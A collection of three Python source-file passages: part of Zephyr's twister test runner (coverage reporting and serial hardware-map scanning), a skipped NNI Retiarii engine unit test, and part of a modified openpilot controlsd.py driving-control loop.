instance.handler: testcase["execution_time"] = handler_time elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]: testcase["status"] = "failed" testcase["reason"] = instance.reason testcase["execution_time"] = handler_time if os.path.exists(handler_log): testcase["test_output"] = self.process_log(handler_log) elif os.path.exists(device_log): testcase["device_log"] = self.process_log(device_log) else: testcase["build_log"] = self.process_log(build_log) testcases.append(testcase) suites = [ {"testcases": testcases} ] report["testsuites"] = suites with open(filename, "wt") as json_file: json.dump(report, json_file, indent=4, separators=(',',':')) def get_testcase(self, identifier): results = [] for _, tc in self.testcases.items(): for case in tc.cases: if case == identifier: results.append(tc) return results def verify_platforms_existence(self, platform_names_to_verify, log_info=""): """ Verify if platform name (passed by --platform option, or in yaml file as platform_allow or integration_platforms options) is correct. If not - log error. """ for platform in platform_names_to_verify: if platform in self.platform_names: break else: logger.error(f"{log_info} - unrecognized platform - {platform}") class CoverageTool: """ Base class for every supported coverage tool """ def __init__(self): self.gcov_tool = None self.base_dir = None @staticmethod def factory(tool): if tool == 'lcov': t = Lcov() elif tool == 'gcovr': t = Gcovr() else: logger.error("Unsupported coverage tool specified: {}".format(tool)) return None logger.debug(f"Select {tool} as the coverage tool...") return t @staticmethod def retrieve_gcov_data(input_file): logger.debug("Working on %s" % input_file) extracted_coverage_info = {} capture_data = False capture_complete = False with open(input_file, 'r') as fp: for line in fp.readlines(): if re.search("GCOV_COVERAGE_DUMP_START", line): capture_data = True continue if re.search("GCOV_COVERAGE_DUMP_END", line): capture_complete = True break # Loop until the coverage data is found. if not capture_data: continue if line.startswith("*"): sp = line.split("<") if len(sp) > 1: # Remove the leading delimiter "*" file_name = sp[0][1:] # Remove the trailing new line char hex_dump = sp[1][:-1] else: continue else: continue extracted_coverage_info.update({file_name: hex_dump}) if not capture_data: capture_complete = True return {'complete': capture_complete, 'data': extracted_coverage_info} @staticmethod def create_gcda_files(extracted_coverage_info): logger.debug("Generating gcda files") for filename, hexdump_val in extracted_coverage_info.items(): # if kobject_hash is given for coverage gcovr fails # hence skipping it problem only in gcovr v4.1 if "kobject_hash" in filename: filename = (filename[:-4]) + "gcno" try: os.remove(filename) except Exception: pass continue with open(filename, 'wb') as fp: fp.write(bytes.fromhex(hexdump_val)) def generate(self, outdir): for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True): gcov_data = self.__class__.retrieve_gcov_data(filename) capture_complete = gcov_data['complete'] extracted_coverage_info = gcov_data['data'] if capture_complete: self.__class__.create_gcda_files(extracted_coverage_info) logger.debug("Gcov data captured: {}".format(filename)) else: logger.error("Gcov data capture incomplete: {}".format(filename)) with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog: ret = self._generate(outdir, coveragelog) if ret == 0: logger.info("HTML report generated: {}".format( os.path.join(outdir, "coverage", "index.html"))) class Lcov(CoverageTool): def __init__(self): super().__init__() self.ignores = [] def add_ignore_file(self, pattern): self.ignores.append('*' + pattern + '*') def add_ignore_directory(self, pattern): self.ignores.append('*/' + pattern + '/*') def _generate(self, outdir, coveragelog): coveragefile = os.path.join(outdir, "coverage.info") ztestfile = os.path.join(outdir, "ztest.info") cmd = ["lcov", "--gcov-tool", self.gcov_tool, "--capture", "--directory", outdir, "--rc", "lcov_branch_coverage=1", "--output-file", coveragefile] cmd_str = " ".join(cmd) logger.debug(f"Running {cmd_str}...") subprocess.call(cmd, stdout=coveragelog) # We want to remove tests/* and tests/ztest/test/* but save tests/ztest subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract", coveragefile, os.path.join(self.base_dir, "tests", "ztest", "*"), "--output-file", ztestfile, "--rc", "lcov_branch_coverage=1"], stdout=coveragelog) if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0: subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove", ztestfile, os.path.join(self.base_dir, "tests/ztest/test/*"), "--output-file", ztestfile, "--rc", "lcov_branch_coverage=1"], stdout=coveragelog) files = [coveragefile, ztestfile] else: files = [coveragefile] for i in self.ignores: subprocess.call( ["lcov", "--gcov-tool", self.gcov_tool, "--remove", coveragefile, i, "--output-file", coveragefile, "--rc", "lcov_branch_coverage=1"], stdout=coveragelog) # The --ignore-errors source option is added to avoid it exiting due to # samples/application_development/external_lib/ return subprocess.call(["genhtml", "--legend", "--branch-coverage", "--ignore-errors", "source", "-output-directory", os.path.join(outdir, "coverage")] + files, stdout=coveragelog) class Gcovr(CoverageTool): def __init__(self): super().__init__() self.ignores = [] def add_ignore_file(self, pattern): self.ignores.append('.*' + pattern + '.*') def add_ignore_directory(self, pattern): self.ignores.append(".*/" + pattern + '/.*') @staticmethod def _interleave_list(prefix, list): tuple_list = [(prefix, item) for item in list] return [item for sublist in tuple_list for item in sublist] def _generate(self, outdir, coveragelog): coveragefile = os.path.join(outdir, "coverage.json") ztestfile = os.path.join(outdir, "ztest.json") excludes = Gcovr._interleave_list("-e", self.ignores) # We want to remove tests/* and tests/ztest/test/* but save tests/ztest cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable", self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o", coveragefile, outdir] cmd_str = " ".join(cmd) logger.debug(f"Running {cmd_str}...") subprocess.call(cmd, stdout=coveragelog) subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable", self.gcov_tool, "-f", "tests/ztest", "-e", "tests/ztest/test/*", "--json", "-o", ztestfile, outdir], stdout=coveragelog) if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0: files = [coveragefile, ztestfile] else: files = [coveragefile] subdir = os.path.join(outdir, "coverage") os.makedirs(subdir, exist_ok=True) tracefiles = self._interleave_list("--add-tracefile", files) return subprocess.call(["gcovr", "-r", self.base_dir, "--html", "--html-details"] + tracefiles + ["-o", os.path.join(subdir, "index.html")], stdout=coveragelog) class DUT(object): def __init__(self, id=None, serial=None, serial_baud=None, platform=None, product=None, serial_pty=None, connected=False, pre_script=None, post_script=None, post_flash_script=None, runner=None): self.serial = serial self.baud = serial_baud or 115200 self.platform = platform self.serial_pty = serial_pty self._counter = Value("i", 0) self._available = Value("i", 1) self.connected = connected self.pre_script = pre_script self.id = id self.product = product self.runner = runner self.fixtures = [] self.post_flash_script = post_flash_script self.post_script = post_script self.pre_script = pre_script self.probe_id = None self.notes = None self.lock = Lock() self.match = False @property def available(self): with self._available.get_lock(): return self._available.value @available.setter def available(self, value): with self._available.get_lock(): self._available.value = value @property def counter(self): with self._counter.get_lock(): return self._counter.value @counter.setter def counter(self, value): with self._counter.get_lock(): self._counter.value = value def to_dict(self): d = {} exclude = ['_available', '_counter', 'match'] v = vars(self) for k in v.keys(): if k not in exclude and v[k]: d[k] = v[k] return d def __repr__(self): return f"<{self.platform} ({self.product}) on {self.serial}>" class HardwareMap: schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml") manufacturer = [ 'ARM', 'SEGGER', 'MBED', 'STMicroelectronics', 'Atmel Corp.', 'Texas Instruments', 'Silicon Labs', 'NXP Semiconductors', 'Microchip Technology Inc.', 'FTDI', 'Digilent' ] runner_mapping = { 'pyocd': [ 'DAPLink CMSIS-DAP', 'MBED CMSIS-DAP' ], 'jlink': [ 'J-Link', 'J-Link OB' ], 'openocd': [ 'STM32 STLink', '^XDS110.*', 'STLINK-V3' ], 'dediprog': [ 'TTL232R-3V3', 'MCP2200 USB Serial Port Emulator' ] } def __init__(self): self.detected = [] self.duts = [] def add_device(self, serial, platform, pre_script, is_pty, baud=None): device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud) if is_pty: device.serial_pty = serial else: device.serial = serial self.duts.append(device) def load(self, map_file): hwm_schema = scl.yaml_load(self.schema_path) duts = scl.yaml_load_verify(map_file, hwm_schema) for dut in duts: pre_script = dut.get('pre_script') post_script = dut.get('post_script') post_flash_script = dut.get('post_flash_script') platform = dut.get('platform') id = dut.get('id') runner = dut.get('runner') serial = dut.get('serial') baud = dut.get('baud', None) product = dut.get('product') fixtures = dut.get('fixtures', []) new_dut = DUT(platform=platform, product=product, runner=runner, id=id, serial=serial, serial_baud=baud, connected=serial is not None, pre_script=pre_script, post_script=post_script, post_flash_script=post_flash_script) new_dut.fixtures = fixtures new_dut.counter = 0 self.duts.append(new_dut) def scan(self, persistent=False): from serial.tools import list_ports if persistent and platform.system() == 'Linux': # On Linux, /dev/serial/by-id provides symlinks to # '/dev/ttyACMx' nodes using names which are unique as # long as manufacturers fill out USB metadata nicely. # # This creates a map from '/dev/ttyACMx' device nodes # to '/dev/serial/by-id/usb-...' symlinks. The symlinks # go into the hardware map because they stay the same # even when the user unplugs / replugs the device. # # Some inexpensive USB/serial adapters don't result # in unique names here, though, so use of this feature # requires explicitly setting persistent=True. by_id = Path('/dev/serial/by-id') def readlink(link): return str((by_id / link).resolve()) persistent_map = {readlink(link): str(link) for link in by_id.iterdir()} else: persistent_map = {} serial_devices = list_ports.comports() logger.info("Scanning connected hardware...") for d in serial_devices: if d.manufacturer in self.manufacturer: # TI XDS110 can have multiple serial devices for a single board # assume endpoint 0 is the serial, skip all others if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'): continue s_dev = DUT(platform="unknown", id=d.serial_number, serial=persistent_map.get(d.device, d.device), product=d.product, runner='unknown', connected=True) for runner, _ in self.runner_mapping.items(): products = self.runner_mapping.get(runner) if d.product in products: s_dev.runner = runner continue # Try regex matching for p in products: if re.match(p, d.product): s_dev.runner = runner s_dev.connected = True s_dev.lock = None self.detected.append(s_dev) else: logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d)) def save(self, hwm_file): # use existing map self.detected.sort(key=lambda x: x.serial or '') if os.path.exists(hwm_file): with open(hwm_file, 'r') as yaml_file: hwm = yaml.load(yaml_file, Loader=SafeLoader) if hwm: hwm.sort(key=lambda x: x['serial'] or '') # disconnect everything for h in hwm: h['connected'] = False h['serial'] = None for _detected in self.detected: for h in hwm: if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match: h['connected'] = True h['serial'] = _detected.serial _detected.match = True new_duts = list(filter(lambda d: not d.match, self.detected)) new = [] for d in new_duts: new.append(d.to_dict()) if hwm: hwm = hwm + new else: hwm = new with open(hwm_file, 'w') as yaml_file: yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False) self.load(hwm_file) logger.info("Registered devices:") self.dump() else: # create new file dl = [] for _connected in self.detected: platform = _connected.platform id = _connected.id runner = _connected.runner serial = _connected.serial product = _connected.product d = { 'platform': platform, 'id': id, 'runner': runner, 'serial': serial, 'product': product, 'connected': _connected.connected } dl.append(d) with open(hwm_file, 'w') as yaml_file: yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False) logger.info("Detected devices:") self.dump(detected=True) def dump(self, filtered=[], header=[], connected_only=False, detected=False): print("") table = [] if detected: to_show = self.detected else: to_show = self.duts if not header: header = ["Platform", "ID", "Serial device"] for p in to_show: platform = p.platform connected = p.connected if filtered and platform not in filtered: continue if not connected_only or connected: table.append([platform, p.id, p.serial]) print(tabulate(table, headers=header, tablefmt="github"))
test_cgo_engine.py
import json import os import sys import threading import unittest import logging import time import torch from pathlib import Path from nni.retiarii.execution.cgo_engine import CGOExecutionEngine from nni.retiarii.execution.logical_optimizer.logical_plan import LogicalPlan from nni.retiarii.execution.logical_optimizer.opt_dedup_input import DedupInputOptimizer from nni.retiarii.codegen import model_to_pytorch_script from nni.retiarii import Model, Node from nni.retiarii import Model, submit_models from nni.retiarii.codegen import model_to_pytorch_script from nni.retiarii.integration import RetiariiAdvisor from nni.retiarii.evaluator.pytorch import PyTorchImageClassificationTrainer, PyTorchMultiModelTrainer from nni.retiarii.utils import import_ def _load_mnist(n_models: int = 1): path = Path(__file__).parent / 'converted_mnist_pytorch.json' with open(path) as f: mnist_model = Model._load(json.load(f)) if n_models == 1: return mnist_model else: models = [mnist_model] for i in range(n_models-1): models.append(mnist_model.fork()) return models @unittest.skip('Skipped in this version') class CGOEngineTest(unittest.TestCase): def test_submit_models(self): os.environ['CGO'] = 'true' os.makedirs('generated', exist_ok=True) from nni.runtime import protocol, platform import nni.runtime.platform.test as tt protocol._out_file = open('generated/debug_protocol_out_file.py', 'wb') protocol._in_file = open('generated/debug_protocol_out_file.py', 'rb') models = _load_mnist(2) advisor = RetiariiAdvisor() submit_models(*models) if torch.cuda.is_available() and torch.cuda.device_count() >= 2: cmd, data = protocol.receive() params = json.loads(data) params['parameters']['training_kwargs']['max_steps'] = 100 tt.init_params(params) trial_thread = threading.Thread(target=CGOExecutionEngine.trial_execute_graph()) trial_thread.start() last_metric = None while True: time.sleep(1) if tt._last_metric: metric = tt.get_last_metric() if metric == last_metric: continue advisor.handle_report_metric_data(metric) last_metric = metric if not trial_thread.is_alive(): break trial_thread.join() advisor.stopping = True advisor.default_worker.join() advisor.assessor_worker.join() if __name__ == '__main__': unittest.main()
controlsd.py
#!/usr/bin/env python3 import os import gc import requests import threading from cereal import car, log from selfdrive.crash import client from common.android import ANDROID, get_sound_card_online from common.numpy_fast import clip from common.realtime import sec_since_boot, set_realtime_priority, set_core_affinity, Ratekeeper, DT_CTRL from common.profiler import Profiler from common.params import Params, put_nonblocking import cereal.messaging as messaging from selfdrive.config import Conversions as CV from selfdrive.boardd.boardd import can_list_to_can_capnp from selfdrive.car.car_helpers import get_car, get_startup_event from selfdrive.controls.lib.drive_helpers import update_v_cruise, initialize_v_cruise from selfdrive.controls.lib.longcontrol import LongControl, STARTING_TARGET_SPEED from selfdrive.controls.lib.latcontrol_pid import LatControlPID from selfdrive.controls.lib.latcontrol_indi import LatControlINDI from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR from selfdrive.controls.lib.events import Events, ET from selfdrive.controls.lib.alertmanager import AlertManager from selfdrive.controls.lib.vehicle_model import VehicleModel from selfdrive.controls.lib.planner import LON_MPC_STEP from selfdrive.locationd.calibration_helpers import Calibration from selfdrive.controls.lib.dynamic_follow.df_manager import dfManager from common.op_params import opParams LDW_MIN_SPEED = 31 * CV.MPH_TO_MS LANE_DEPARTURE_THRESHOLD = 0.1 STEER_ANGLE_SATURATION_TIMEOUT = 1.0 / DT_CTRL STEER_ANGLE_SATURATION_THRESHOLD = 2.5 # Degrees ThermalStatus = log.ThermalData.ThermalStatus State = log.ControlsState.OpenpilotState HwType = log.HealthData.HwType LongitudinalPlanSource = log.Plan.LongitudinalPlanSource Desire = log.PathPlan.Desire LaneChangeState = log.PathPlan.LaneChangeState LaneChangeDirection = log.PathPlan.LaneChangeDirection EventName = car.CarEvent.EventName def log_fingerprint(candidate, timeout=30): try: requests.get('https://sentry.io', timeout=timeout) client.captureMessage("fingerprinted {}".format(candidate), level='info') return except: pass class Controls: def __init__(self, sm=None, pm=None, can_sock=None): gc.disable() set_realtime_priority(53) set_core_affinity(3) # Setup sockets self.pm = pm if self.pm is None: self.pm = messaging.PubMaster(['sendcan', 'controlsState', 'carState', 'carControl', 'carEvents', 'carParams']) self.sm = sm if self.sm is None: self.sm = messaging.SubMaster(['thermal', 'health', 'frame', 'model', 'liveCalibration', 'dMonitoringState', 'plan', 'pathPlan', 'liveLocationKalman']) self.sm_smiskol = messaging.SubMaster(['radarState', 'dynamicFollowData', 'liveTracks', 'dynamicFollowButton', 'laneSpeed', 'dynamicCameraOffset', 'modelLongButton']) self.op_params = opParams() self.df_manager = dfManager(self.op_params) self.hide_auto_df_alerts = self.op_params.get('hide_auto_df_alerts') self.support_white_panda = self.op_params.get('support_white_panda') self.last_model_long = False self.can_sock = can_sock if can_sock is None: can_timeout = None if os.environ.get('NO_CAN_TIMEOUT', False) else 100 self.can_sock = messaging.sub_sock('can', timeout=can_timeout) # wait for one health and one CAN packet hw_type = messaging.recv_one(self.sm.sock['health']).health.hwType has_relay = hw_type in [HwType.blackPanda, HwType.uno, HwType.dos] print("Waiting for CAN messages...") messaging.get_one_can(self.can_sock) self.CI, self.CP, candidate = get_car(self.can_sock, self.pm.sock['sendcan'], has_relay) threading.Thread(target=log_fingerprint, args=[candidate]).start() # read params params = Params() self.is_metric = params.get("IsMetric", encoding='utf8') == "1" self.is_ldw_enabled = params.get("IsLdwEnabled", encoding='utf8') == "1" internet_needed = (params.get("Offroad_ConnectivityNeeded", encoding='utf8') is not None) and (params.get("DisableUpdates") != b"1") community_feature_toggle = params.get("CommunityFeaturesToggle", encoding='utf8') == "1" openpilot_enabled_toggle = params.get("OpenpilotEnabledToggle", encoding='utf8') == "1" passive = params.get("Passive", encoding='utf8') == "1" or \ internet_needed or not openpilot_enabled_toggle # detect sound card presence and ensure successful init sounds_available = not ANDROID or get_sound_card_online() car_recognized = self.CP.carName != 'mock' # If stock camera is disconnected, we loaded car controls and it's not dashcam mode controller_available = self.CP.enableCamera and self.CI.CC is not None and not passive community_feature_disallowed = self.CP.communityFeature and not community_feature_toggle self.read_only = not car_recognized or not controller_available or \ self.CP.dashcamOnly or community_feature_disallowed if self.read_only: self.CP.safetyModel = car.CarParams.SafetyModel.noOutput # Write CarParams for radard and boardd safety mode cp_bytes = self.CP.to_bytes() params.put("CarParams", cp_bytes) put_nonblocking("CarParamsCache", cp_bytes) put_nonblocking("LongitudinalControl", "1" if self.CP.openpilotLongitudinalControl else "0") self.CC = car.CarControl.new_message() self.AM = AlertManager() self.events = Events() self.LoC = LongControl(self.CP, self.CI.compute_gb, candidate) self.VM = VehicleModel(self.CP) if self.CP.lateralTuning.which() == 'pid': self.LaC = LatControlPID(self.CP) elif self.CP.lateralTuning.which() == 'indi': self.LaC = LatControlINDI(self.CP) elif self.CP.lateralTuning.which() == 'lqr': self.LaC = LatControlLQR(self.CP) self.state = State.disabled self.enabled = False self.active = False self.can_rcv_error = False self.soft_disable_timer = 0 self.v_cruise_kph = 255 self.v_cruise_kph_last = 0 self.mismatch_counter = 0 self.can_error_counter = 0 self.last_blinker_frame = 0 self.saturated_count = 0 self.distance_traveled = 0 self.events_prev = [] self.current_alert_types = [ET.PERMANENT] self.sm['liveCalibration'].calStatus = Calibration.INVALID self.sm['thermal'].freeSpace = 1. self.sm['dMonitoringState'].events = [] self.sm['dMonitoringState'].awarenessStatus = 1. self.sm['dMonitoringState'].faceDetected = False self.startup_event = get_startup_event(car_recognized, controller_available) if not sounds_available: self.events.add(EventName.soundsUnavailable, static=True) if internet_needed: self.events.add(EventName.internetConnectivityNeeded, static=True) if community_feature_disallowed: self.events.add(EventName.communityFeatureDisallowed, static=True) if self.read_only and not passive: self.events.add(EventName.carUnrecognized, static=True) if not self.support_white_panda: if hw_type == HwType.whitePanda: self.events.add(EventName.whitePandaUnsupported, static=True) # controlsd is driven by can recv, expected at 100Hz self.rk = Ratekeeper(100, print_delay_threshold=None) self.prof = Profiler(False) # off by default def update_events(self, CS): """Compute carEvents from carState""" self.events.clear() self.events.add_from_msg(CS.events) self.events.add_from_msg(self.sm['dMonitoringState'].events) # Handle startup event if self.startup_event is not None: self.events.add(self.startup_event) self.startup_event = None # Create events for battery, temperature, disk space, and memory if self.sm['thermal'].batteryPercent < 1 and self.sm['thermal'].chargingError: # at zero percent battery, while discharging, OP should not allowed self.events.add(EventName.lowBattery) if self.sm['thermal'].thermalStatus >= ThermalStatus.red: self.events.add(EventName.overheat) if self.sm['thermal'].freeSpace < 0.07: # under 7% of space free no enable allowed self.events.add(EventName.outOfSpace) if self.sm['thermal'].memUsedPercent > 90: self.events.add(EventName.lowMemory) # Handle calibration status cal_status = self.sm['liveCalibration'].calStatus if cal_status != Calibration.CALIBRATED: if cal_status == Calibration.UNCALIBRATED: self.events.add(EventName.calibrationIncomplete) else: self.events.add(EventName.calibrationInvalid) # Handle lane change if self.sm['pathPlan'].laneChangeState == LaneChangeState.preLaneChange: direction = self.sm['pathPlan'].laneChangeDirection if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \ (CS.rightBlindspot and direction == LaneChangeDirection.right): self.events.add(EventName.laneChangeBlocked) else: if direction == LaneChangeDirection.left: self.events.add(EventName.preLaneChangeLeft) else: self.events.add(EventName.preLaneChangeRight) elif self.sm['pathPlan'].laneChangeState in [LaneChangeState.laneChangeStarting, LaneChangeState.laneChangeFinishing]: self.events.add(EventName.laneChange) if self.can_rcv_error or (not CS.canValid and self.sm.frame > 5 / DT_CTRL): self.events.add(EventName.canError) if self.mismatch_counter >= 200: self.events.add(EventName.controlsMismatch) if not self.sm.alive['plan'] and self.sm.alive['pathPlan']: # only plan not being received: radar not communicating self.events.add(EventName.radarCommIssue) elif not self.sm.all_alive_and_valid(): self.events.add(EventName.commIssue) if not self.sm['pathPlan'].mpcSolutionValid: self.events.add(EventName.plannerError) if not self.sm['liveLocationKalman'].sensorsOK and os.getenv("NOSENSOR") is None: if self.sm.frame > 5 / DT_CTRL: # Give locationd some time to receive all the inputs self.events.add(EventName.sensorDataInvalid) if not self.sm['liveLocationKalman'].gpsOK and (self.distance_traveled > 1000) and os.getenv("NOSENSOR") is None and not self.support_white_panda: # Not show in first 1 km to allow for driving out of garage. This event shows after 5 minutes self.events.add(EventName.noGps) if not self.sm['pathPlan'].paramsValid: self.events.add(EventName.vehicleModelInvalid) if not self.sm['liveLocationKalman'].posenetOK: self.events.add(EventName.posenetInvalid) if not self.sm['frame'].recoverState < 2: # counter>=2 is active self.events.add(EventName.focusRecoverActive) if not self.sm['plan'].radarValid: self.events.add(EventName.radarFault) if self.sm['plan'].radarCanError: self.events.add(EventName.radarCanError) if log.HealthData.FaultType.relayMalfunction in self.sm['health'].faults: self.events.add(EventName.relayMalfunction) if self.sm['plan'].fcw: self.events.add(EventName.fcw) if self.sm['model'].frameDropPerc > 1: self.events.add(EventName.modeldLagging) # Only allow engagement with brake pressed when stopped behind another stopped car if CS.brakePressed and self.sm['plan'].vTargetFuture >= STARTING_TARGET_SPEED \ and not self.CP.radarOffCan and CS.vEgo < 0.3: self.events.add(EventName.noTarget) self.add_stock_additions_alerts(CS) def add_stock_additions_alerts(self, CS): self.AM.SA_set_frame(self.sm.frame) self.AM.SA_set_enabled(self.enabled) # alert priority is defined by code location, keeping is highest, then lane speed alert, then auto-df alert if self.sm_smiskol['modelLongButton'].enabled != self.last_model_long: extra_text_1 = 'disabled!' if self.last_model_long else 'enabled!' extra_text_2 = '' if self.last_model_long else ', model may behave unexpectedly' self.AM.SA_add('modelLongAlert', extra_text_1=extra_text_1, extra_text_2=extra_text_2) return if self.sm_smiskol['dynamicCameraOffset'].keepingLeft: self.AM.SA_add('laneSpeedKeeping', extra_text_1='LEFT', extra_text_2='Oncoming traffic in right lane') return elif self.sm_smiskol['dynamicCameraOffset'].keepingRight: self.AM.SA_add('laneSpeedKeeping', extra_text_1='RIGHT', extra_text_2='Oncoming traffic in left lane') return ls_state = self.sm_smiskol['laneSpeed'].state if ls_state != '': self.AM.SA_add('lsButtonAlert', extra_text_1=ls_state) return faster_lane = self.sm_smiskol['laneSpeed'].fastestLane if faster_lane in ['left', 'right']: ls_alert = 'laneSpeedAlert' if not self.sm_smiskol['laneSpeed'].new: ls_alert += 'Silent' self.AM.SA_add(ls_alert, extra_text_1='{} lane faster'.format(faster_lane).upper(), extra_text_2='Change lanes to faster {} lane'.format(faster_lane)) return df_out = self.df_manager.update() if df_out.changed: df_alert = 'dfButtonAlert' if df_out.is_auto and df_out.last_is_auto: # only show auto alert if engaged, not hiding auto, and time since lane speed alert not showing if CS.cruiseState.enabled and not self.hide_auto_df_alerts: df_alert += 'Silent' self.AM.SA_add(df_alert, extra_text_1=df_out.model_profile_text + ' (auto)') return else: self.AM.SA_add(df_alert, extra_text_1=df_out.user_profile_text, extra_text_2='Dynamic follow: {} profile active'.format(df_out.user_profile_text)) return def data_sample(self): """Receive data from sockets and update carState""" # Update carState from CAN can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True) CS = self.CI.update(self.CC, can_strs) self.sm.update(0) self.sm_smiskol.update(0) # Check for CAN timeout if not can_strs: self.can_error_counter += 1 self.can_rcv_error = True else: self.can_rcv_error = False # When the panda and controlsd do not agree on controls_allowed # we want to disengage openpilot. However the status from the panda goes through # another socket other than the CAN messages and one can arrive earlier than the other. # Therefore we allow a mismatch for two samples, then we trigger the disengagement. if not self.enabled: self.mismatch_counter = 0 if not self.sm['health'].controlsAllowed and self.enabled: self.mismatch_counter += 1 self.distance_traveled += CS.vEgo * DT_CTRL return CS def state_transition(self, CS): """Compute conditional state transitions and execute actions on state transitions""" self.v_cruise_kph_last = self.v_cruise_kph # if stock cruise is completely disabled, then we can use our own set speed logic if not self.CP.enableCruise: self.v_cruise_kph = update_v_cruise(self.v_cruise_kph, CS.buttonEvents, self.enabled) elif self.CP.enableCruise and CS.cruiseState.enabled: self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH # decrease the soft disable timer at every step, as it's reset on # entrance in SOFT_DISABLING state self.soft_disable_timer = max(0, self.soft_disable_timer - 1) self.current_alert_types = [ET.PERMANENT] # ENABLED, PRE ENABLING, SOFT DISABLING if self.state != State.disabled: # user and immediate disable always have priority in a non-disabled state if self.events.any(ET.USER_DISABLE): self.state = State.disabled self.current_alert_types.append(ET.USER_DISABLE) elif self.events.any(ET.IMMEDIATE_DISABLE): self.state = State.disabled self.current_alert_types.append(ET.IMMEDIATE_DISABLE) else: # ENABLED if self.state == State.enabled: if self.events.any(ET.SOFT_DISABLE): self.state = State.softDisabling self.soft_disable_timer = 300 # 3s self.current_alert_types.append(ET.SOFT_DISABLE) # SOFT DISABLING elif self.state == State.softDisabling: if not self.events.any(ET.SOFT_DISABLE): # no more soft disabling condition, so go back to ENABLED self.state = State.enabled elif self.events.any(ET.SOFT_DISABLE) and self.soft_disable_timer > 0: self.current_alert_types.append(ET.SOFT_DISABLE) elif self.soft_disable_timer <= 0: self.state = State.disabled # PRE ENABLING elif self.state == State.preEnabled: if not self.events.any(ET.PRE_ENABLE): self.state = State.enabled else: self.current_alert_types.append(ET.PRE_ENABLE) # DISABLED elif self.state == State.disabled: if self.events.any(ET.ENABLE): if self.events.any(ET.NO_ENTRY): self.current_alert_types.append(ET.NO_ENTRY) else: if self.events.any(ET.PRE_ENABLE): self.state = State.preEnabled else: self.state = State.enabled self.current_alert_types.append(ET.ENABLE) self.v_cruise_kph = initialize_v_cruise(CS.vEgo, CS.buttonEvents, self.v_cruise_kph_last) # Check if actuators are enabled self.active = self.state == State.enabled or self.state == State.softDisabling if self.active: self.current_alert_types.append(ET.WARNING) # Check if openpilot is engaged self.enabled = self.active or self.state == State.preEnabled def state_control(self, CS): """Given the state, this function returns an actuators packet""" plan = self.sm['plan'] path_plan = self.sm['pathPlan'] actuators = car.CarControl.Actuators.new_message() if CS.leftBlinker or CS.rightBlinker: self.last_blinker_frame = self.sm.frame # State specific actions if not self.active: self.LaC.reset() self.LoC.reset(v_pid=plan.vTargetFuture) plan_age = DT_CTRL * (self.sm.frame - self.sm.rcv_frame['plan']) # no greater than dt mpc + dt, to prevent too high extraps dt = min(plan_age, LON_MPC_STEP + DT_CTRL) + DT_CTRL a_acc_sol = plan.aStart + (dt / LON_MPC_STEP) * (plan.aTarget - plan.aStart) v_acc_sol = plan.vStart + dt * (a_acc_sol + plan.aStart) / 2.0 extras_loc = {'lead_one': self.sm_smiskol['radarState'].leadOne, 'mpc_TR': self.sm_smiskol['dynamicFollowData'].mpcTR, 'live_tracks': self.sm_smiskol['liveTracks'], 'has_lead': plan.hasLead} # Gas/Brake PID loop actuators.gas, actuators.brake = self.LoC.update(self.active, CS, v_acc_sol, plan.vTargetFuture, a_acc_sol, self.CP, extras_loc) # Steering PID loop and lateral MPC actuators.steer, actuators.steerAngle, lac_log = self.LaC.update(self.active, CS, self.CP, path_plan) # Check for difference between desired angle and angle for angle based control angle_control_saturated = self.CP.steerControlType == car.CarParams.SteerControlType.angle and \ abs(actuators.steerAngle - CS.steeringAngle) > STEER_ANGLE_SATURATION_THRESHOLD if angle_control_saturated and not CS.steeringPressed and self.active: self.saturated_count += 1 else: self.saturated_count = 0 # Send a "steering required alert" if saturation count has reached the limit if (lac_log.saturated and not CS.steeringPressed) or \ (self.saturated_count > STEER_ANGLE_SATURATION_TIMEOUT): # Check if we deviated from the path left_deviation = actuators.steer > 0 and path_plan.dPoly[3] > 0.1 right_deviation = actuators.steer < 0 and path_plan.dPoly[3] < -0.1 if left_deviation or right_deviation: self.events.add(EventName.steerSaturated) return actuators, v_acc_sol, a_acc_sol, lac_log def publish_logs(self, CS, start_time, actuators, v_acc, a_acc, lac_log): """Send actuators and hud commands to the car, send controlsstate and MPC logging""" CC = car.CarControl.new_message() CC.enabled = self.enabled CC.actuators = actuators CC.cruiseControl.override = True CC.cruiseControl.cancel = not self.CP.enableCruise or (not self.enabled and CS.cruiseState.enabled) # Some override values for Honda # brake discount removes a sharp nonlinearity brake_discount = (1.0 - clip(actuators.brake * 3., 0.0, 1.0)) speed_override = max(0.0, (self.LoC.v_pid + CS.cruiseState.speedOffset) * brake_discount) CC.cruiseControl.speedOverride = float(speed_override if self.CP.enableCruise else 0.0) CC.cruiseControl.accelOverride = self.CI.calc_accel_override(CS.aEgo, self.sm['plan'].aTarget, CS.vEgo, self.sm['plan'].vTarget) CC.hudControl.setSpeed = float(self.v_cruise_kph * CV.KPH_TO_MS) CC.hudControl.speedVisible = self.enabled CC.hudControl.lanesVisible = self.enabled CC.hudControl.leadVisible = self.sm['plan'].hasLead right_lane_visible = self.sm['pathPlan'].rProb > 0.5 left_lane_visible = self.sm['pathPlan'].lProb > 0.5 CC.hudControl.rightLaneVisible = bool(right_lane_visible) CC.hudControl.leftLaneVisible = bool(left_lane_visible) recent_blinker = (self.sm.frame - self.last_blinker_frame) * DT_CTRL < 5.0 # 5s blinker cooldown ldw_allowed = self.is_ldw_enabled and CS.vEgo > LDW_MIN_SPEED and not 